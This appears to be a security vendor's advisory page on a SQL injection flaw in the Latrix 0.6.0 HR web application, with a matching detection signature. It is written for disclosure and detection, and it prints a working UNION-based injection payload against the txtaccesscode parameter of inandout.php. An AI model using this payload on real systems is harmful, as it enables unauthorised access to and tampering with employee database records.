top of page

Latrix 0.6.0 SQL Injection


Application Details

LATRIX is an HR support web application. It contains features such as presence and attendance recording, attendance tracking, paperless applications, a fire register, and extensive reporting options.


Vulnerability

Latrix is vulnerable to SQL injection.


Identification

A remote attacker could send specially crafted SQL statements to the inandout.php script using the 'txtaccesscode' parameter, which could allow the attacker to view, add, modify or delete information in the back-end database.

POST /latrix/inandout.php
PAYLOAD - txtaccesscode=111' UNION ALL SELECT CONCAT(0x716b627a71,0x7577616c424c7a446a4c7854717a7372696c7145414e4e5a597a4e76784e616e6f48635971446b44,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&btnsubmit=Submit


Detection

By turning this into a traffic file and matching rule, we are able to detect attempts to influence the vulnerable parameter with SQL injections.


Coverage

Idappcom has created signature 8021154 along with a traffic file.


References

Latrix 0.6.0 SQL Injection - Packet Storm Security


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional

bottom of page